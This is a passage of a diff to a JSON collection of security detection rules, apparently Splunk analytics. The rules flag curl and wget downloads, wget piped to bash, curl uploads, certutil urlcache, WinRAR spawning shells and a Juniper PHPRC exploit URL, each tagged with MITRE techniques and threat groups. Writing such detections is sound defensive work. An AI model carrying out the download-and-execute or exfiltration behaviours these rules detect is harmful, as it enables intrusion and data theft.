Transfer", + "mitre_attack_tactics": [ + "Command And Control" + ], + "mitre_attack_groups": [ + "APT-C-36", + "APT18", + "APT28", + "APT29", + "APT3", + "APT32", + "APT33", + "APT37", + "APT38", + "APT39", + "APT41", + "Ajax Security Team", + "Andariel", + "Aquatic Panda", + "BITTER", + "BRONZE BUTLER", + "BackdoorDiplomacy", + "Chimera", + "Cobalt Group", + "Confucius", + "Darkhotel", + "Dragonfly", + "Elderwood", + "Ember Bear", + "Evilnum", + "FIN7", + "FIN8", + "Fox Kitten", + "GALLIUM", + "Gamaredon Group", + "Gorgon Group", + "HAFNIUM", + "HEXANE", + "IndigoZebra", + "Indrik Spider", + "Ke3chang", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "LuminousMoth", + "Magic Hound", + "Metador", + "Molerats", + "Moses Staff", + "MuddyWater", + "Mustang Panda", + "Nomadic Octopus", + "OilRig", + "PLATINUM", + "Patchwork", + "Rancor", + "Rocke", + "Sandworm Team", + "SideCopy", + "Sidewinder", + "Silence", + "TA505", + "TA551", + "TeamTNT", + "Threat Group-3390", + "Tonto Team", + "Tropic Trooper", + "Turla", + "Volatile Cedar", + "WIRTE", + "Whitefly", + "Windshift", + "Winnti Group", + "ZIRCONIUM", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1027.011", + "mitre_attack_technique": "Fileless Storage", + "mitre_attack_tactics": [ + "Defense Evasion" + ], + "mitre_attack_groups": [ + "APT32", + "Turla" + ] + } + ] + } + }, + { + "name": "Suspicious Curl Network Connection", + "description": "The following analytic identifies the use of a curl contacting suspicious remote domains to checkin to Command And Control servers or download further implants. In the context of Silver Sparrow, curl is identified contacting s3.amazonaws.com. This particular behavior is common with MacOS adware-malicious software.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=curl Processes.process=s3.amazonaws.com by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `suspicious_curl_network_connection_filter`", + "tags": { + "name": "Suspicious Curl Network Connection", + "analytic_story": [ + "Silver Sparrow", + "Ingress Tool Transfer", + "Linux Living Off The Land" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Command And Control" + ], + "message": "tbd", + "mitre_attack_id": [ + "T1105" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + } + ], + "risk_score": 25, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1105", + "mitre_attack_technique": "Ingress Tool Transfer", + "mitre_attack_tactics": [ + "Command And Control" + ], + "mitre_attack_groups": [ + "APT-C-36", + "APT18", + "APT28", + "APT29", + "APT3", + "APT32", + "APT33", + "APT37", + "APT38", + "APT39", + "APT41", + "Ajax Security Team", + "Andariel", + "Aquatic Panda", + "BITTER", + "BRONZE BUTLER", + "BackdoorDiplomacy", + "Chimera", + "Cobalt Group", + "Confucius", + "Darkhotel", + "Dragonfly", + "Elderwood", + "Ember Bear", + "Evilnum", + "FIN7", + "FIN8", + "Fox Kitten", + "GALLIUM", + "Gamaredon Group", + "Gorgon Group", + "HAFNIUM", + "HEXANE", + "IndigoZebra", + "Indrik Spider", + "Ke3chang", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "LuminousMoth", + "Magic Hound", + "Metador", + "Molerats", + "Moses Staff", + "MuddyWater", + "Mustang Panda", + "Nomadic Octopus", + "OilRig", + "PLATINUM", + "Patchwork", + "Rancor", + "Rocke", + "Sandworm Team", + "SideCopy", + "Sidewinder", + "Silence", + "TA505", + "TA551", + "TeamTNT", + "Threat Group-3390", + "Tonto Team", + "Tropic Trooper", + "Turla", + "Volatile Cedar", + "WIRTE", + "Whitefly", + "Windshift", + "Winnti Group", + "ZIRCONIUM", + "menuPass" + ] + } + ] + } + }, + { + "name": "Wget Download and Bash Execution", + "description": "The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=wget (Processes.process=\"*-q *\" OR Processes.process=\"*--quiet*\" AND Processes.process=\"*-O- *\") OR (Processes.process=\"*|*\" AND Processes.process=\"*bash*\") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `wget_download_and_bash_execution_filter`", + "tags": { + "name": "Wget Download and Bash Execution", + "analytic_story": [ + "Ingress Tool Transfer", + "Log4Shell CVE-2021-44228" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Command And Control" + ], + "message": "An instance of $process_name$ was identified on endpoint $dest$ attempting to download a remote file and run it with bash.", + "mitre_attack_id": [ + "T1105" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "process_name", + "type": "Process", + "role": [ + "Child Process" + ] + } + ], + "risk_score": 80, + "security_domain": "endpoint", + "risk_severity": "high", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1105", + "mitre_attack_technique": "Ingress Tool Transfer", + "mitre_attack_tactics": [ + "Command And Control" + ], + "mitre_attack_groups": [ + "APT-C-36", + "APT18", + "APT28", + "APT29", + "APT3", + "APT32", + "APT33", + "APT37", + "APT38", + "APT39", + "APT41", + "Ajax Security Team", + "Andariel", + "Aquatic Panda", + "BITTER", + "BRONZE BUTLER", + "BackdoorDiplomacy", + "Chimera", + "Cobalt Group", + "Confucius", + "Darkhotel", + "Dragonfly", + "Elderwood", + "Ember Bear", + "Evilnum", + "FIN7", + "FIN8", + "Fox Kitten", + "GALLIUM", + "Gamaredon Group", + "Gorgon Group", + "HAFNIUM", + "HEXANE", + "IndigoZebra", + "Indrik Spider", + "Ke3chang", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "LuminousMoth", + "Magic Hound", + "Metador", + "Molerats", + "Moses Staff", + "MuddyWater", + "Mustang Panda", + "Nomadic Octopus", + "OilRig", + "PLATINUM", + "Patchwork", + "Rancor", + "Rocke", + "Sandworm Team", + "SideCopy", + "Sidewinder", + "Silence", + "TA505", + "TA551", + "TeamTNT", + "Threat Group-3390", + "Tonto Team", + "Tropic Trooper", + "Turla", + "Volatile Cedar", + "WIRTE", + "Whitefly", + "Windshift", + "Winnti Group", + "ZIRCONIUM", + "menuPass" + ] } ] } }, { - "name": "Suspicious Curl Network Connection", - "description": "The following analytic identifies the use of a curl contacting suspicious remote domains to checkin to Command And Control servers or download further implants. In the context of Silver Sparrow, curl is identified contacting s3.amazonaws.com. This particular behavior is common with MacOS adware-malicious software.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=curl Processes.process=s3.amazonaws.com by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `suspicious_curl_network_connection_filter`", + "name": "Windows Curl Download to Suspicious Path", + "description": "The following analytic identifies the use of Windows Curl.exe downloading a file to a suspicious location. \\\n-O or --output is used when a file is to be downloaded and placed in a specified location. \\\nDuring triage, review parallel processes for further behavior. In addition, identify if the download was successful. If a file was downloaded, capture and analyze.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_curl` Processes.process IN (\"*-O *\",\"*--output*\") Processes.process IN (\"*\\\\appdata\\\\*\",\"*\\\\programdata\\\\*\",\"*\\\\public\\\\*\") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_curl_download_to_suspicious_path_filter`", "tags": { - "name": "Suspicious Curl Network Connection", + "name": "Windows Curl Download to Suspicious Path", "analytic_story": [ - "Silver Sparrow", + "IcedID", "Ingress Tool Transfer", - "Linux Living Off The Land" + "Forest Blizzard" ], "asset_type": "Endpoint", "cis20": [ @@ -632835,7 +639587,7 @@ "kill_chain_phases": [ "Command And Control" ], - "message": "tbd", + "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ to download a file to a suspicious directory.", "mitre_attack_id": [ "T1105" ], @@ -632856,11 +639608,25 @@ "role": [ "Victim" ] + }, + { + "name": "parent_process_name", + "type": "Process", + "role": [ + "Parent Process" + ] + }, + { + "name": "process_name", + "type": "Process", + "role": [ + "Child Process" + ] } ], - "risk_score": 25, + "risk_score": 80, "security_domain": "endpoint", - "risk_severity": "low", + "risk_severity": "high", "mitre_attack_enrichments": [ { "mitre_attack_id": "T1105", @@ -632946,14 +639712,13 @@ } }, { - "name": "Wget Download and Bash Execution", - "description": "The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=wget (Processes.process=\"*-q *\" OR Processes.process=\"*--quiet*\" AND Processes.process=\"*-O- *\") OR (Processes.process=\"*|*\" AND Processes.process=\"*bash*\") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `wget_download_and_bash_execution_filter`", + "name": "Windows Curl Upload to Remote Destination", + "description": "The following analytic identifies the use of Windows Curl.exe uploading a file to a remote destination. \\\n`-T` or `--upload-file` is used when a file is to be uploaded to a remotge destination. \\\n`-d` or `--data` POST is the HTTP method that was invented to send data to a receiving web application, and it is, for example, how most common HTML forms on the web work. \\\nHTTP multipart formposts are done with `-F`, but this appears to not be compatible with the Windows version of Curl. Will update if identified adversary tradecraft. \\\nAdversaries may use one of the three methods based on the remote destination and what they are attempting to upload (zip vs txt). During triage, review parallel processes for further behavior. In addition, identify if the upload was successful in network logs. If a file was uploaded, isolate the endpoint and review.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_curl` Processes.process IN (\"*-T *\",\"*--upload-file *\", \"*-d *\", \"*--data *\", \"*-F *\") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_curl_upload_to_remote_destination_filter`", "tags": { - "name": "Wget Download and Bash Execution", + "name": "Windows Curl Upload to Remote Destination", "analytic_story": [ - "Ingress Tool Transfer", - "Log4Shell CVE-2021-44228" + "Ingress Tool Transfer" ], "asset_type": "Endpoint", "cis20": [ @@ -632962,7 +639727,7 @@ "kill_chain_phases": [ "Command And Control" ], - "message": "An instance of $process_name$ was identified on endpoint $dest$ attempting to download a remote file and run it with bash.", + "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ uploading a file to a remote destination.", "mitre_attack_id": [ "T1105" ], @@ -632984,6 +639749,13 @@ "Victim" ] }, + { + "name": "parent_process_name", + "type": "Process", + "role": [ + "Parent Process" + ] + }, { "name": "process_name", "type": "Process", @@ -633080,14 +639852,13 @@ } }, { - "name": "Windows Curl Download to Suspicious Path", - "description": "The following analytic identifies the use of Windows Curl.exe downloading a file to a suspicious location. \\\n-O or --output is used when a file is to be downloaded and placed in a specified location. \\\nDuring triage, review parallel processes for further behavior. In addition, identify if the download was successful. If a file was downloaded, capture and analyze.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_curl` Processes.process IN (\"*-O *\",\"*--output*\") Processes.process IN (\"*\\\\appdata\\\\*\",\"*\\\\programdata\\\\*\",\"*\\\\public\\\\*\") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_curl_download_to_suspicious_path_filter`", + "name": "Windows Ingress Tool Transfer Using Explorer", + "description": "The following analytic identifies the Windows Explorer process with a URL within the command-line. Explorer.exe is known Windows process that handles start menu, taskbar, desktop and file manager. Many adversaries abuse this process, like DCRat malware, where it attempts to open the URL with the default browser application on the target host by putting the URL as a parameter on explorer.exe process. This anomaly detection might be a good pivot to check which user and how this process was executed, what is the parent process and what is the URL link. This technique is not commonly used to open an URL.", + "search": "| tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name = explorer.exe OR Processes.original_file_name = explorer.exe) AND NOT (Processes.parent_process_name IN(\"userinit.exe\", \"svchost.exe\")) Processes.process IN (\"* http://*\", \"* https://*\") by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_ingress_tool_transfer_using_explorer_filter`", "tags": { - "name": "Windows Curl Download to Suspicious Path", + "name": "Windows Ingress Tool Transfer Using Explorer", "analytic_story": [ - "IcedID", - "Ingress Tool Transfer" + "DarkCrystal RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -633096,12 +639867,12 @@ "kill_chain_phases": [ "Command And Control" ], - "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ to download a file to a suspicious directory.", + "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to download a remote payload.", "mitre_attack_id": [ "T1105" ], "nist": [ - "DE.CM" + "DE.AE" ], "observable": [ { @@ -633133,9 +639904,9 @@ ] } ], - "risk_score": 80, + "risk_score": 25, "security_domain": "endpoint", - "risk_severity": "high", + "risk_severity": "low", "mitre_attack_enrichments": [ { "mitre_attack_id": "T1105", @@ -633221,24 +639992,26 @@ } }, { - "name": "Windows Curl Upload to Remote Destination", - "description": "The following analytic identifies the use of Windows Curl.exe uploading a file to a remote destination. \\\n`-T` or `--upload-file` is used when a file is to be uploaded to a remotge destination. \\\n`-d` or `--data` POST is the HTTP method that was invented to send data to a receiving web application, and it is, for example, how most common HTML forms on the web work. \\\nHTTP multipart formposts are done with `-F`, but this appears to not be compatible with the Windows version of Curl. Will update if identified adversary tradecraft. \\\nAdversaries may use one of the three methods based on the remote destination and what they are attempting to upload (zip vs txt). During triage, review parallel processes for further behavior. In addition, identify if the upload was successful in network logs. If a file was uploaded, isolate the endpoint and review.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_curl` Processes.process IN (\"*-T *\",\"*--upload-file *\", \"*-d *\", \"*--data *\", \"*-F *\") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_curl_upload_to_remote_destination_filter`", + "name": "Windows Ldifde Directory Object Behavior", + "description": "The following analytic identifies the use of Ldifde.exe, which provides the ability to create, modify, or delete LDAP directory objects. Natively, the binary is only installed on a domain controller. However, adversaries or administrators may install the Windows Remote Server Admin Tools for ldifde.exe. Ldifde.exe is a Microsoft Windows command-line utility used to import or export LDAP directory entries. LDAP stands for Lightweight Directory Access Protocol, which is a protocol used for accessing and managing directory information services over an IP network. LDIF, on the other hand, stands for LDAP Data Interchange Format, a standard plain-text data interchange format for representing LDAP directory entries. -i This is a flag used with Ldifde.exe to denote import mode. In import mode, Ldifde.exe takes an LDIF file and imports its contents into the LDAP directory. The data in the LDIF file might include new objects to be created, or modifications or deletions to existing objects. -f This flag is used to specify the filename of the LDIF file that Ldifde.exe will import from (in the case of the -i flag) or export to (without the -i flag). For example, if you wanted to import data from a file called data.ldif, you would use the command ldifde -i -f data.ldif. Keep in mind that while the use of Ldifde.exe is legitimate in many contexts, it can also be used maliciously. For instance, an attacker who has gained access to a domain controller could potentially use Ldifde.exe to export sensitive data or make unauthorized changes to the directory. Therefore, it's important to monitor for unusual or unauthorized use of this tool.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=ldifde.exe Processes.process IN (\"*-i *\", \"*-f *\") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_ldifde_directory_object_behavior_filter`", "tags": { - "name": "Windows Curl Upload to Remote Destination", + "name": "Windows Ldifde Directory Object Behavior", "analytic_story": [ - "Ingress Tool Transfer" + "Volt Typhoon" ], "asset_type": "Endpoint", "cis20": [ "CIS 10" ], "kill_chain_phases": [ - "Command And Control" + "Command And Control", + "Exploitation" ], - "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ uploading a file to a remote destination.", + "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ utilizing ldifde on a domain controller.", "mitre_attack_id": [ - "T1105" + "T1105", + "T1069.002" ], "nist": [ "DE.CM" @@ -633273,9 +640046,12 @@ ] } ], - "risk_score": 80, + "risk_score": 40, "security_domain": "endpoint", - "risk_severity": "high", + "risk_severity": "low", + "atomic_guid": [ + "22cf8cb9-adb1-4e8c-80ca-7c723dfc8784" + ], "mitre_attack_enrichments": [ { "mitre_attack_id": "T1105", @@ -633356,18 +640132,33 @@ "ZIRCONIUM", "menuPass" ] + }, + { + "mitre_attack_id": "T1069.002", + "mitre_attack_technique": "Domain Groups", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [ + "Dragonfly", + "Inception", + "Ke3chang", + "LAPSUS$", + "OilRig", + "Turla" + ] } ] } }, { - "name": "Windows Ingress Tool Transfer Using Explorer", - "description": "The following analytic identifies the Windows Explorer process with a URL within the command-line. Explorer.exe is known Windows process that handles start menu, taskbar, desktop and file manager. Many adversaries abuse this process, like DCRat malware, where it attempts to open the URL with the default browser application on the target host by putting the URL as a parameter on explorer.exe process. This anomaly detection might be a good pivot to check which user and how this process was executed, what is the parent process and what is the URL link. This technique is not commonly used to open an URL.", - "search": "| tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name = explorer.exe OR Processes.original_file_name = explorer.exe) AND NOT (Processes.parent_process_name IN(\"userinit.exe\", \"svchost.exe\")) Processes.process IN (\"* http://*\", \"* https://*\") by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_ingress_tool_transfer_using_explorer_filter`", + "name": "Windows SQL Spawning CertUtil", + "description": "The following analytic detects the use of certutil to download software, a behavior exhibited by the threat actor Flax Typhoon. This actor deploys a VPN connection by downloading an executable file for SoftEther VPN from their network infrastructure using one of several LOLBins, including certutil. The actor then uses the Service Control Manager (SCM) to create a Windows service that launches the VPN connection automatically when the system starts. This behavior allows the actor to monitor the availability of the compromised system and establish an RDP connection. This analytic identifies this behavior by monitoring for the use of certutil in conjunction with the downloading of software. This behavior is worth identifying for a SOC as it indicates a potential compromise of the system and the establishment of a persistent threat. If a true positive is found, it suggests an attacker has gained access to the environment and is attempting to maintain that access, potentially leading to further malicious activities such as data theft or ransomware attacks. Be aware of potential false positives - legitimate uses of certutil in your environment may cause benign activities to be flagged. Upon triage, review the command executed and look for concurrent processes to identify the attack source. This approach helps analysts detect potential threats earlier and mitigate the risks.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN (\"sqlservr.exe\", \"sqlagent.exe\", \"sqlps.exe\", \"launchpad.exe\", \"sqldumper.exe\") `process_certutil` (Processes.process=*urlcache* Processes.process=*split*) OR Processes.process=*urlcache* by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.original_file_name Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_sql_spawning_certutil_filter`", "tags": { - "name": "Windows Ingress Tool Transfer Using Explorer", + "name": "Windows SQL Spawning CertUtil", "analytic_story": [ - "DarkCrystal RAT" + "Flax Typhoon" ], "asset_type": "Endpoint", "cis20": [ @@ -633376,12 +640167,146 @@ "kill_chain_phases": [ "Command And Control" ], - "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to download a remote payload.", + "message": "$process_name$ was launched on $dest$ by $user$. This behavior is uncommon with the SQL process identified.", "mitre_attack_id": [ "T1105" ], "nist": [ - "DE.AE" + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Endpoint", + "role": [ + "Victim" + ] + }, + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "process_name", + "type": "Process", + "role": [ + "Target" + ] + } + ], + "risk_score": 90, + "security_domain": "endpoint", + "risk_severity": "high", + "atomic_guid": [], + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1105", + "mitre_attack_technique": "Ingress Tool Transfer", + "mitre_attack_tactics": [ + "Command And Control" + ], + "mitre_attack_groups": [ + "APT-C-36", + "APT18", + "APT28", + "APT29", + "APT3", + "APT32", + "APT33", + "APT37", + "APT38", + "APT39", + "APT41", + "Ajax Security Team", + "Andariel", + "Aquatic Panda", + "BITTER", + "BRONZE BUTLER", + "BackdoorDiplomacy", + "Chimera", + "Cobalt Group", + "Confucius", + "Darkhotel", + "Dragonfly", + "Elderwood", + "Ember Bear", + "Evilnum", + "FIN7", + "FIN8", + "Fox Kitten", + "GALLIUM", + "Gamaredon Group", + "Gorgon Group", + "HAFNIUM", + "HEXANE", + "IndigoZebra", + "Indrik Spider", + "Ke3chang", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "LuminousMoth", + "Magic Hound", + "Metador", + "Molerats", + "Moses Staff", + "MuddyWater", + "Mustang Panda", + "Nomadic Octopus", + "OilRig", + "PLATINUM", + "Patchwork", + "Rancor", + "Rocke", + "Sandworm Team", + "SideCopy", + "Sidewinder", + "Silence", + "TA505", + "TA551", + "TeamTNT", + "Threat Group-3390", + "Tonto Team", + "Tropic Trooper", + "Turla", + "Volatile Cedar", + "WIRTE", + "Whitefly", + "Windshift", + "Winnti Group", + "ZIRCONIUM", + "menuPass" + ] + } + ] + } + }, + { + "name": "WinRAR Spawning Shell Application", + "description": "The following analytic detects the execution of Windows shell processes initiated by WinRAR, specifically looking for instances where WinRAR spawns processes like \"cmd.exe\", \"powershell.exe\", \"certutil.exe\", \"mshta.exe\", or \"bitsadmin.exe\". This behavior is worth identifying for a Security Operations Center (SOC) because it is indicative of a spoofing attack exploit, such as the one associated with WinRAR CVE-2023-38831. Cybercriminals exploited this vulnerability to craft ZIP archives with spoofed extensions, hiding the launch of malicious scripts within an archive. When a victim opened the specially crafted archive, it executed the malware, leading to unauthorized access to their broker accounts and enabling the cybercriminals to perform illicit financial transactions and withdraw funds. If a true positive is found, it suggests that an attacker has successfully exploited the vulnerability to execute malicious scripts, leading to unauthorized access, financial loss, and potentially the delivery of additional malicious payloads. The impact of the attack could be severe, involving financial loss, unauthorized access to sensitive accounts, and the potential for further malicious activity such as data theft or ransomware attacks.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=winrar.exe `windows_shells` OR Processes.process_name IN (\"certutil.exe\",\"mshta.exe\",\"bitsadmin.exe\") by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `winrar_spawning_shell_application_filter`", + "tags": { + "name": "WinRAR Spawning Shell Application", + "analytic_story": [ + "WinRAR Spoofing Attack CVE-2023-38831" + ], + "asset_type": "endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Command And Control" + ], + "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to decode a file.", + "mitre_attack_id": [ + "T1105" + ], + "nist": [ + "DE.CM" ], "observable": [ { @@ -633413,9 +640338,10 @@ ] } ], - "risk_score": 25, + "risk_score": 70, "security_domain": "endpoint", - "risk_severity": "low", + "risk_severity": "medium", + "atomic_guid": [], "mitre_attack_enrichments": [ { "mitre_attack_id": "T1105", @@ -633501,38 +640427,33 @@ } }, { - "name": "Windows Ldifde Directory Object Behavior", - "description": "The following analytic identifies the use of Ldifde.exe, which provides the ability to create, modify, or delete LDAP directory objects. Natively, the binary is only installed on a domain controller. However, adversaries or administrators may install the Windows Remote Server Admin Tools for ldifde.exe. Ldifde.exe is a Microsoft Windows command-line utility used to import or export LDAP directory entries. LDAP stands for Lightweight Directory Access Protocol, which is a protocol used for accessing and managing directory information services over an IP network. LDIF, on the other hand, stands for LDAP Data Interchange Format, a standard plain-text data interchange format for representing LDAP directory entries. -i This is a flag used with Ldifde.exe to denote import mode. In import mode, Ldifde.exe takes an LDIF file and imports its contents into the LDAP directory. The data in the LDIF file might include new objects to be created, or modifications or deletions to existing objects. -f This flag is used to specify the filename of the LDIF file that Ldifde.exe will import from (in the case of the -i flag) or export to (without the -i flag). For example, if you wanted to import data from a file called data.ldif, you would use the command ldifde -i -f data.ldif. Keep in mind that while the use of Ldifde.exe is legitimate in many contexts, it can also be used maliciously. For instance, an attacker who has gained access to a domain controller could potentially use Ldifde.exe to export sensitive data or make unauthorized changes to the directory. Therefore, it's important to monitor for unusual or unauthorized use of this tool.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=ldifde.exe Processes.process IN (\"*-i *\", \"*-f *\") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_ldifde_directory_object_behavior_filter`", + "name": "Juniper Networks Remote Code Execution Exploit Detection", + "description": "The following analytic detects the exploitation of a remote code execution vulnerability in Juniper Networks devices. The vulnerability involves multiple steps, including uploading a malicious PHP file and an INI file to the target server, and then executing the PHP code by manipulating the PHP configuration via the uploaded INI file. The analytic specifically looks for requests to /webauth_operation.php?PHPRC=*, which are used to upload the files and execute the code, respectively. This behavior is worth identifying for a SOC because it indicates that an attacker is attempting to exploit the vulnerability to gain unauthorized access to the device and execute arbitrary code. If a true positive is found, it suggests that an attacker has successfully exploited the vulnerability and may have gained control over the device, leading to data theft, network compromise, or other damaging outcomes. Upon triage, review the request parameters and the response to determine if the exploitation was successful. Capture and inspect any relevant network traffic and server logs to identify the attack source. This approach helps analysts detect potential threats earlier and mitigate the risks.", + "search": "| tstats count min(_time) as firstTime max(_time) as lastTime from datamodel=Web where Web.url IN (\"*/webauth_operation.php?PHPRC=*\") Web.status=200 by Web.http_user_agent, Web.status Web.http_method, Web.url, Web.url_length, Web.src, Web.dest, sourcetype | `drop_dm_object_name(\"Web\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `juniper_networks_remote_code_execution_exploit_detection_filter`", "tags": { - "name": "Windows Ldifde Directory Object Behavior", + "name": "Juniper Networks Remote Code Execution Exploit Detection", "analytic_story": [ - "Volt Typhoon" + "Juniper JunOS Remote Code Execution" ], - "asset_type": "Endpoint", + "asset_type": "Web server", "cis20": [ - "CIS 10" + "CIS 13" ], "kill_chain_phases": [ + "Delivery", "Command And Control", - "Exploitation" + "Installation" ], - "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ utilizing ldifde on a domain controller.", + "message": "This analytic has identified a potential exploitation of a remote code execution vulnerability in Juniper Networks devices on $dest$ on the URL $url$ used for the exploit.", "mitre_attack_id": [ + "T1190", "T1105", - "T1069.002" + "T1059" ], "nist": [ "DE.CM" ], "observable": [ - { - "name": "user", - "type": "User", - "role": [ - "Victim" - ] - }, { "name": "dest", "type": "Hostname", @@ -633541,27 +640462,50 @@ ] }, { - "name": "parent_process_name", - "type": "Process", - "role": [ - "Parent Process" - ] - }, - { - "name": "process_name", - "type": "Process", + "name": "url", + "type": "URL String", "role": [ - "Child Process" + "Attacker" ] } ], - "risk_score": 40, - "security_domain": "endpoint", - "risk_severity": "low", - "atomic_guid": [ - "22cf8cb9-adb1-4e8c-80ca-7c723dfc8784" - ], + "risk_score": 72, + "security_domain": "network", + "risk_severity": "medium", + "atomic_guid": [], "mitre_attack_enrichments": [ + { + 